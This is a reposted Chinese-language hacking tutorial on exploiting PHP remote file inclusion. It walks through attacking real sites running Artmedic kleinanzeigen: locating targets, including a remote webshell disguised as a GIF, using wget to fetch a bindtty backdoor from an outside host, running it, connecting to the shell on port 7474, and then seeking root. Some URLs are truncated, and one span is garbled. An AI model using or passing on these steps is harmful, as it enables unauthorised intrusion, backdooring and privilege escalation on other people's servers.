php远程文件包含漏洞的前提是,PHP远程文件包含漏洞的利用

PHP远程文件包含漏洞的利用

by:CrAcKlOve

让我们先看看以下代码,Codz:

include($page);

?>

由于$page变量缺少充分过滤,判断$page是不是本地的还是远程服务器上的,因此我们可以指定远程服务器的文件作为参数提交给$page变量,以web权限执行远程文件.

2)漏洞的初步应用假设某一站点的index.php代码如下Codz:

include($page);

?>

我们就可以提交:http://siteurl.tld/index.php?page=h...服务器/文件名称假设我们远程文件名称为warez.php,内容为Codz:

system("ls /tmp/");

?>

这样就能把warez.php下载到本地,并且执行! 说白了,就是把tmp下的文件显示出来.

3)实战演练说了一大堆,现在开始锻炼实践能力了,嘿嘿.⑴准备工作:①存在远程文件包含漏洞的站点②phpshell③Backdoor

对于①,大家可以到www.cnns.net或者www.securiteam.com?..米罱腁rtmedic kleinanzeigen漏洞练手.Artmedic kleinanzeigen由于index.php的$site变量缺少过滤,导致了远程文件包含漏洞.所以我们可以提交以下urlhttp://Artmedic kleinanzeigen url/path/index.php?site=http://phpshellurl那如何找到使用Artmedic kleinanzeigen的站点呢?这里有个小技巧,我顺便说一下.我先去Artmedic kleinanzeigen的官方站找到Artmedic kleinanzeigen程序的演示,随便点了个连接,连接为http://siteurl.com/index.php?site=a...enmaerktestart,那些使用Artmedic kleinanzeigen的站就差不多出来了,我们可以一一去尝试!

对于②,我推荐Data Cha0s PHP Command/Safemode Exploit 4.1,或者angel的saphpshell,phpspy,功能都不错.

对于③,你可以使用绑定端口的程序bind,然后根据程序绑定的端口telnet.你可以使用san以前用过的Digit-Labs Connect-Back Backdoor,不过我经常使用bindtty,bindtty绑定7474端口.

⑵开始利用①提交http://xxx.de/index.php?site=http:/.../cse.gif?cmd=id说明一下,cse.gif是上文所说的Data Cha0s PHP Command/Safemode Exploit 4.1,cmd=id是查询当前用户的权限.一般所都是uid=99(nobody) gid=99(nobody) groups=99(nobody),uid不是0,所以他不是root级别的帐户.竟然可以执行,那么说明system函数没有被禁止,那我们就可以大胆的执行命令了!

②提交http://xxx.de/index.php?site=http:/...se.gif?cmd=wget http://phphot.com/bindtty -O /tmp/bindtty这样就把bindtty下载到tmp目录下.可能你会为,为什么要下到tmp目录下呢?因为tmp目录一般都可写.

③文件已经下载了,我们必须设置属性,不然运行不了,会提示没有权限.http://xxx.de/index.php?site=http:/...e.gif?cmd=chmod 775 /tmp/bindtty这样我们就有权限执行bindtty文件了!

④执行bindttyhttp://xxx.de/index.php?site=http:/...md=/tmp/bindtty成功的话,它会显示Daemon is starting...OK, pid = xxxx.因为上文已经说bindtty绑定的是7474端口,现在我们可以telnet host 7474.ps:不推荐使用windows命令提示符进行telnet,会出现字符混乱的现象,推荐使用putty.

⑤提升到root,这就是你的工作了.你可以根据cse.gif所显示的一些信息寻找对应的exploit进行提升权限.

这样就差不多结束了,有问题的话欢迎提出.

小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里注册账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!

免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!

你可能感兴趣的:(php远程文件包含漏洞的前提是)